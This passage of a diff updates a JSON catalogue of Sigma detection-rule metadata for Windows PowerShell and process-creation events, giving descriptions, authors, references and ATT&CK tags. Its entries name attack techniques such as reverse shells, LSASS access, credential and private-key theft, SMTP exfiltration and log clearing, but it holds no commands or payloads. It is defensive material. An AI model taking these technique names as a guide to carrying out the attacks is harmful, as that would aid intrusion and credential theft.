prompt", - "meta": { - "author": "John Lambert (idea), Florian Roth (rule)", - "creation_date": "2017/04/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_prompt_credentials.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/850381440629981184", - "https://t.co/ezOTGy1a1G", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "value": "PowerShell Credential Prompt" - }, - { - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/04", - "falsepositive": [ - "Unlikely" - ], - "filename": "posh_ps_psasyncshell.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/JoelGMSec/PSAsyncShell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", - "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" - }, - { - "description": "Detects the use of PSAttack PowerShell hack tool", - "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule)", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_psattack.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", - "value": "PowerShell PSAttack" - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/06", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_remote_session_creation.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", - "value": "PowerShell Remote Session Creation" - }, - { - "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", - "meta": { - "author": "frack113", - "creation_date": "2022/01/15", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_remove_item_path.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", - "value": "Use Remove-Item to Delete File" - }, - { - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_request_kerberos_ticket.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", - "value": "Request A Single Ticket via PowerShell" - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "meta": { - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "creation_date": "2020/10/10", - "falsepositive": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" - ], - "filename": "posh_ps_root_certificate_installed.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ] - }, - "uuid": "42821614-9264-4761-acfc-5772c3286f76", - "value": "Root Certificate Installed - PowerShell" - }, - { - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "meta": { - "author": "frack113", - "creation_date": "2022/02/01", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_run_from_mount_diskimage.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ] - }, - "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", - "value": "Suspicious Invoke-Item From Mount-DiskImage" - }, - { - "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_security_software_discovery.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ] - }, - "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", - "value": "Security Software Discovery by Powershell" - }, - { - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/26", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_send_mailmessage.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", - "https://www.ietf.org/rfc/rfc2821.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", - "value": "Powershell Exfiltration Over SMTP" - }, - { - "description": "Detect adversaries enumerate sensitive files", - "meta": { - "author": "frack113", - "creation_date": "2022/09/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_sensitive_file_discovery.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/malmoeb/status/1570814999370801158", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", - "value": "Powershell Sensitive File Discovery" - }, - { - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", - "meta": { - "author": "frack113", - "creation_date": "2021/10/20", - "falsepositive": [ - "Administrator script" - ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", - "https://adsecurity.org/?p=2604", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "value": "Change PowerShell Policies to an Insecure Level - PowerShell" - }, - { - "description": "Detects Base64 encoded Shellcode", - "meta": { - "author": "David Ledbetter (shellcode), Florian Roth (rule)", - "creation_date": "2018/11/17", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_shellcode_b64.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1063072865992523776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "value": "PowerShell ShellCode" - }, - { - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Shellntel/scripts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", - "value": "Malicious ShellIntel PowerShell Commandlets" - }, - { - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/16", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "posh_ps_software_discovery.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", - "https://github.com/harleyQu1nn/AggressorScripts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518" - ] - }, - "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "value": "Detected Windows Software Discovery - PowerShell" - }, - { - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "meta": { - "author": "frack113", - "creation_date": "2021/09/02", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", - "value": "Powershell Store File In Alternate Data Stream" - }, - { - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_ad_group_reco.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", - "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" - }, - { - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/12", - "falsepositive": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" - ], - "filename": "posh_ps_susp_clear_eventlog.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/oroneequalsone/status/1568432028361830402", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001" - ] - }, - "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", - "value": "Suspicious Eventlog Clear" - }, - { - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_directory_enum.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "value": "Powershell Directory Enumeration" - }, - { - "description": "Detects suspicious PowerShell download command", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/05", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "filename": "posh_ps_susp_download.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", - "value": "Suspicious PowerShell Download - Powershell Script" - }, - { - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/02", - "falsepositive": [ - "Legitimate administration script" - ], - "filename": "posh_ps_susp_execute_batch_script.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", - "value": "Powershell Execute Batch Script" - }, - { - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/04/23", - "falsepositive": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" - ], - "filename": "posh_ps_susp_export_pfxcertificate.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", - "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ] - }, - "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "value": "Suspicious Export-PfxCertificate" - }, - { - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/19", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_extracting.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", - "value": "Extracting Information with PowerShell" - }, - { - "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/21", - "falsepositive": [ - "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" - ], - "filename": "posh_ps_susp_follina_execution.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1537919885031772161", - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Bash/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" ], "tags": [ "attack.defense_evasion", "attack.t1202" ] }, - "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", - "value": "Troubleshooting Pack Cmdlet Execution" + "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "value": "Suspicious Subsystem for Linux Bash Execution" }, { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", "meta": { - "author": "Florian Roth", - "creation_date": "2021/04/23", + "author": "Markus Neis", + "creation_date": "2018/06/07", "falsepositive": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "filename": "posh_ps_susp_getprocess_lsass.yml", + "filename": "proc_creation_win_lethalhta.yml", "level": "high", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/PythonResponder/status/1385064506049630211", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218.005" ] }, - "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "value": "PowerShell Get-Process LSASS in ScriptBlock" + "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "value": "MSHTA Spwaned by SVCHOST" }, { - "description": "Detects suspicious Powershell code that execute COM Objects", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", "meta": { - "author": "frack113", - "creation_date": "2022/04/02", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "creation_date": "2020/03/04", "falsepositive": [ - "Legitimate PowerShell scripts" + "Unlikely" ], - "filename": "posh_ps_susp_gettypefromclsid.yml", - "level": "medium", - "logsource.category": "ps_script", + "filename": "proc_creation_win_mmc20_lateral_movement.yml", + "level": "high", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" + ], + "tags": [ + "attack.execution", + "attack.t1021.003" + ] + }, + "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "value": "MMC20 Lateral Movement" + }, + { + "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_whoami_as_priv_user.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://nsudo.m2team.org/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" ], "tags": [ "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "value": "Suspicious GetTypeFromCLSID ShellExecute" - }, - { - "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", - "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1201" - ] - }, - "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", - "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" - }, - { - "description": "Detects the use of PowerShell to identify the current logged user.", - "meta": { - "author": "frack113", - "creation_date": "2022/04/04", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_get_current_user.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" - ], - "tags": [ "attack.discovery", "attack.t1033" ] }, - "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", - "value": "Suspicious PowerShell Get Current User" + "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "value": "Run Whoami as Privileged User" }, { - "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "meta": { - "author": "frack113", - "creation_date": "2022/06/04", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_get_gpo.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1615" - ] - }, - "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", - "value": "Suspicious GPO Discovery With Get-GPO" - }, - { - "description": "Get the processes that are running on the local computer.", - "meta": { - "author": "frack113", + "author": "Florian Roth", "creation_date": "2022/03/17", "falsepositive": [ - "Legitimate PowerShell scripts" + "Unlikely" ], - "filename": "posh_ps_susp_get_process.yml", - "level": "low", - "logsource.category": "ps_script", + "filename": "proc_creation_win_webshell_hacking.yml", + "level": "high", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ] - }, - "uuid": "af4c87ce-bdda-4215-b998-15220772e993", - "value": "Suspicious Process Discovery With Get-Process" - }, - { - "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", - "meta": { - "author": "frack113", - "creation_date": "2022/01/12", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_gwmi.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/datasources/DS0005/", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" + "https://youtu.be/7aemGhaE9ds?t=641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" ], "tags": [ "attack.persistence", - "attack.t1546" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ] }, - "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", - "value": "Suspicious Get-WmiObject" + "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "value": "Webshell Hacking Activity Patterns" }, { - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "meta": { - "author": "frack113", - "creation_date": "2022/04/09", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_hyper_v_condlet.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", - 